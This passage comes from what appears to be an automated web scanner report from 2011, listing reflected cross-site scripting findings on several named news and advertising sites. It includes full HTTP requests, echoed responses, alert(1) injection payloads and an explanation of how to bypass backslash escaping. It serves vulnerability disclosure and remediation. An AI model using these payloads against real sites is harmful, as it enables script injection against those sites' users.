},'request_0d10a0<script>alert(1)</script>d403d598350');

2.78. http://todayshow.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://todayshow.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5d7ee%3balert(1)//3561661cc9e was submitted in the jscallback parameter. This input was echoed as 5d7ee;alert(1)//3561661cc9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ipid=10684&di=30370346,30370289,30370287,30370173&syid=0,0,0,0&adid=0,0,0,0&pid=2,2,2,2&cc=us&rcc=us&hk=1&ts=20110509160239&so=0&mh=2e0d94c556e85670a6e0a4603c9a1040&pvu=D5F2C53627D84E5F933CABE668888988&pvm=f10bcd0a04d4e06bea5c817385b3fae2&uf=0,0,0,0&ur=0,0,0,0&from=1002&jscallback=$iTXT.js.callback05d7ee%3balert(1)//3561661cc9e HTTP/1.1
Host: todayshow.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X7mIwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X7mIwA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:03:40 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 09 May 2011 16:03:40 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback05d7ee;alert(1)//3561661cc9e();}catch(e){}

2.79. http://todayshow.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://todayshow.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 99724<script>alert(1)</script>91080e44cdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=10684&99724<script>alert(1)</script>91080e44cdd=1 HTTP/1.1
Host: todayshow.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9CgwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X9yzAA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:03:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:10 GMT
Age: 0
Connection: keep-alive
Content-Length: 8128

/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ
...[SNIP]...
ad();}}};function itxtBegin(){
var itxturl='http://todayshow.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10684&99724<script>alert(1)</script>91080e44cdd=1';
itxturl+='&seid='+gSEID+'&sest='+gSEST;
if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl);
} else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() {
$iTXT.js.load(itxturl);
...[SNIP]...

2.80. http://todayshow.us.intellitxt.com/v3/door.jsp [sest parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://todayshow.us.intellitxt.com
Path:   /v3/door.jsp

Issue detail

The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc566\'%3balert(1)//64a63b57b65 was submitted in the sest parameter. This input was echoed as dc566\\';alert(1)//64a63b57b65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /v3/door.jsp?ts=1304956957548&pagecl=14338&enc=utf-8&fv=102&muid=B506C07761D7465D924574124E3C14DF&ipid=10684&seid=0&sest=dc566\'%3balert(1)//64a63b57b65 HTTP/1.1
Host: todayshow.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X7mIwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: application/x-javascript;charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:34 GMT
Age: 0
Connection: keep-alive
Content-Length: 16389


/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={}
...[SNIP]...
omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=1;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='dc566\\';alert(1)//64a63b57b65';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL>
...[SNIP]...

2.81. http://www.polls.newsvine.com/_api/comments/getComments [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_api/comments/getComments

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 3050f<script>alert(1)</script>18f8d8f456f was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_api/comments/getComments?n=10&u=http%3A%2F%2Ftoday.msnbc.msn.com%2Fid%2F42953716%2F&t=humor%2Cbooks%2Ctoday&jsoncallback=commentdata3050f<script>alert(1)</script>18f8d8f456f HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=0cee624861ff357c85817cc52b48f039

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 373
Content-Type: application/json
Cache-Control: max-age=300
Expires: Mon, 09 May 2011 16:08:49 GMT
Date: Mon, 09 May 2011 16:03:49 GMT
Connection: close

           
commentdata3050f<script>alert(1)</script>18f8d8f456f({"response":{"article":[{"url":"http:\/\/today.polls.newsvine.com\/_news\/2011\/05\/09\/6611143-chelsea-handlers-victims-get-their-turn","headline":"Chelsea Handler's victims get their turn","leadin":
...[SNIP]...

2.82. http://www.publishersweekly.com/pw/ajax.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/ajax.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65273<script>alert(1)</script>d9fb1b41341882372 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /pw/65273<script>alert(1)</script>d9fb1b41341882372?proc=mark_popular&article=47134 HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
Referer: http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html
Origin: http://www.publishersweekly.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231239710.1304956960.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=231239710.467890405.1304956960.1304956960.1304956960.1; __utmc=231239710; __utmb=231239710.1.10.1304956960; __gads=ID=c2c959c0854368ab:T=1304956962:S=ALNI_MaVPyM7_AF7bXlkSyUbZOyeke88aw

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:29 GMT
X-Varnish: 441693821
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 402

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/65273<script>alert(1)</script>d9fb1b41341882372</TITLE>
<META NAME="ROBOTS" content="NO
...[SNIP]...
</HEAD>
layout for /65273<script>alert(1)</script>d9fb1b41341882372 was not found


<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. -->
...[SNIP]...

2.83. http://www.publishersweekly.com/pw/ajax.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/ajax.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload bc00f</title><script>alert(1)</script>ec28f08f4de88aceb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /pw/bc00f</title><script>alert(1)</script>ec28f08f4de88aceb?proc=mark_popular&article=47134 HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
Referer: http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html
Origin: http://www.publishersweekly.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231239710.1304956960.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=231239710.467890405.1304956960.1304956960.1304956960.1; __utmc=231239710; __utmb=231239710.1.10.1304956960; __gads=ID=c2c959c0854368ab:T=1304956962:S=ALNI_MaVPyM7_AF7bXlkSyUbZOyeke88aw

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:33 GMT
X-Varnish: 441694122
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 418

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/bc00f</title><script>alert(1)</script>ec28f08f4de88aceb</TITLE>
<META NAME="ROBOTS" con
...[SNIP]...

2.84. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66b05<script>alert(1)</script>86589435ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic66b05<script>alert(1)</script>86589435ba/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:09 GMT
X-Varnish: 441692548
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic66b05<script>alert(1)</script>86589435ba/book-news/page-to-screen/article/47134
...[SNIP]...
</HEAD>
layout for /by-topic66b05<script>alert(1)</script>86589435ba/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html was not found


<!-- this page was generated by the Iowa(tm) Content Management System by Me
...[SNIP]...

2.85. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 18327</title><script>alert(1)</script>763a940e35b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic18327</title><script>alert(1)</script>763a940e35b/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:12 GMT
X-Varnish: 441692804
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic18327</title><script>alert(1)</script>763a940e35b/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html</TITLE>
...[SNIP]...

2.86. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1e6e6<script>alert(1)</script>60df9f52946 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic/book-news/page-to-screen/article1e6e6<script>alert(1)</script>60df9f52946/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:33 GMT
X-Varnish: 441694139
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic/book-news/page-to-screen/article1e6e6<script>alert(1)</script>60df9f52946/4713
...[SNIP]...
</HEAD>
layout for /by-topic/book-news/page-to-screen/article1e6e6<script>alert(1)</script>60df9f52946/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html was not found


<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. -->
...[SNIP]...

2.87. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 4703b</title><script>alert(1)</script>347f9ca127f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic/book-news/page-to-screen/article4703b</title><script>alert(1)</script>347f9ca127f/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:37 GMT
X-Varnish: 441694317
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic/book-news/page-to-screen/article4703b</title><script>alert(1)</script>347f9ca127f/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html</TITLE>
...[SNIP]...

2.88. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 13457</title><script>alert(1)</script>069dc24f0c2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html13457</title><script>alert(1)</script>069dc24f0c2 HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:42 GMT
X-Varnish: 441694546
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html13457</title><script>alert(1)</script>069dc24f0c2</TITLE>
...[SNIP]...

2.89. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 434dd<script>alert(1)</script>d35c3f7de24 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html434dd<script>alert(1)</script>d35c3f7de24 HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:39 GMT
X-Varnish: 441694409
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chels
...[SNIP]...
</HEAD>
layout for /by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html434dd<script>alert(1)</script>d35c3f7de24 was not found


<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. -->
...[SNIP]...

2.90. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feef7'%3balert(1)//7c3e7a3ab5b was submitted in the cli cookie. This input was echoed as feef7';alert(1)//7c3e7a3ab5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_ent;sz=728x90;net=q1;ord=957008422;ord1=89470;cmpgurl=http%253A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%253Fodyssey%253Dmod%25257Cnewswell%25257Ctext%25257CHome%25257Cs? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989efeef7'%3balert(1)//7c3e7a3ab5b; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:35 GMT
Connection: close
Content-Length: 7244

